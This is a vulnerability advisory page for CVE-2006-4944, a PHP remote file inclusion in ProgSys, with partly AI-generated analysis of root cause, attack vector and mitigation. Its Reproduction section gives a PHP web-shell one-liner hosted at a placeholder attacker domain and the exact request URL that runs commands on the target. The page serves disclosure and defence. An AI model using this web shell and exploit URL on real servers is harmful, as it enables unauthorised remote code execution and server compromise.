CVE-2006-4944
Description
A PHP remote file inclusion in ProgSys ≤0.151 allows code execution via the phpdns_basedir parameter in Net/DNS/RR.php.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A PHP remote file inclusion in ProgSys ≤0.151 allows code execution via the phpdns_basedir parameter in Net/DNS/RR.php.
Vulnerability
A PHP remote file inclusion vulnerability exists in includes/pear/Net/DNS/RR.php in ProgSys versions 0.151 and earlier. The script unsafely uses the phpdns_basedir parameter as a URL without proper sanitization, allowing an attacker to include arbitrary remote files [1].
Exploitation
An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable script with the phpdns_basedir parameter set to a URL pointing to a remote shell (e.g., a PHP script hosted on the attacker's server). No authentication is required; the attack can be performed remotely with network access to the target ProgSys installation [1].
Impact
Successful exploitation allows the attacker to execute arbitrary PHP code on the target server, leading to complete compromise of the web application and potentially the underlying system, depending on file permissions and server configuration [1].
Mitigation
The vulnerability exists in ProgSys 0.151 and earlier. No official patch or updated version is mentioned in the available references. Users should consider removing or disabling the component, applying input validation to the phpdns_basedir parameter, or upgrading to a non-vulnerable alternative if available [1].
AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Unsanitized user input passed via the `phpdns_basedir` parameter is used directly in a PHP include statement, enabling remote file inclusion."
Attack vector
An attacker sends an HTTP GET request to `includes/pear/Net/DNS/RR.php` with the `phpdns_basedir` parameter set to a URL pointing to a malicious PHP script hosted on an attacker-controlled server [ref_id=1]. The vulnerable code passes this unsanitized URL into a PHP include directive, causing the remote script to be executed on the target server [CWE-94]. The attacker can then pass arbitrary commands via a command variable (e.g., `cmd`) appended to the request [ref_id=1]. No authentication is required, and the attack is performed over HTTP.
Affected code
The vulnerable file is `includes/pear/Net/DNS/RR.php` in ProgSys 0.151 and earlier. The `phpdns_basedir` parameter is passed directly into a PHP `include()` or `require()` call without sanitization, enabling remote file inclusion [ref_id=1].
What the fix does
No patch is included in the bundle. The advisory does not specify a fix, but the remediation would require sanitizing the `phpdns_basedir` parameter to accept only a local path (e.g., by stripping URLs, validating against an allowlist, or using a hardcoded base directory) rather than passing user-supplied input directly to `include()` [CWE-94].
Preconditions
- configThe target must be running ProgSys version 0.151 or earlier.
- networkThe attacker must have network access to the target web server.
- inputThe attacker must host a malicious PHP script at a URL reachable from the target server.
Reproduction
1. Host a PHP command shell (e.g., `<?passthru($_GET[cmd]);?>`) at a URL such as `http://attacker.com/cmd.txt`. 2. Send a request to the target: `http://target.com/ProgSys/includes/pear/Net/DNS/RR.php?phpdns_basedir=http://attacker.com/cmd.txt?&cmd=id`. 3. The output of the `id` command will be returned in the HTTP response [ref_id=1].
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
3News mentions
0No linked articles in our index yet.